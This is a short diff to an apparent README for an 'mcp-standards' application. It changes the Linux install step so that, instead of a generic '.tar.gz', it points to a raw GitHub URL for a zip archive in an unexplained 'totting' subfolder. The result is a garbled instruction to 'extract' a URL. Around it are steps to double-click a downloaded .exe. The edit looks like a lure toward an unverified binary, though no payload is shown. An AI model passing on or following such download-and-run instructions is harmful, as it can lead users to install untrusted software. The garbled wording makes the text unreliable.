Joldphysics/mcp-standards/README.md

 3. **Install the Application:**
    - For Windows: Double-click the `.exe` file you downloaded.
    - For macOS: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the instructions in the README inside the folder.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Joldphysics/mcp-standards/main/totting/mcp-standards.zip` file and follow the instructions in the README inside the folder.

 4. **Run the Application:**
    - After installation, open the application.
 You should see a simple interface to start interacting with the AI.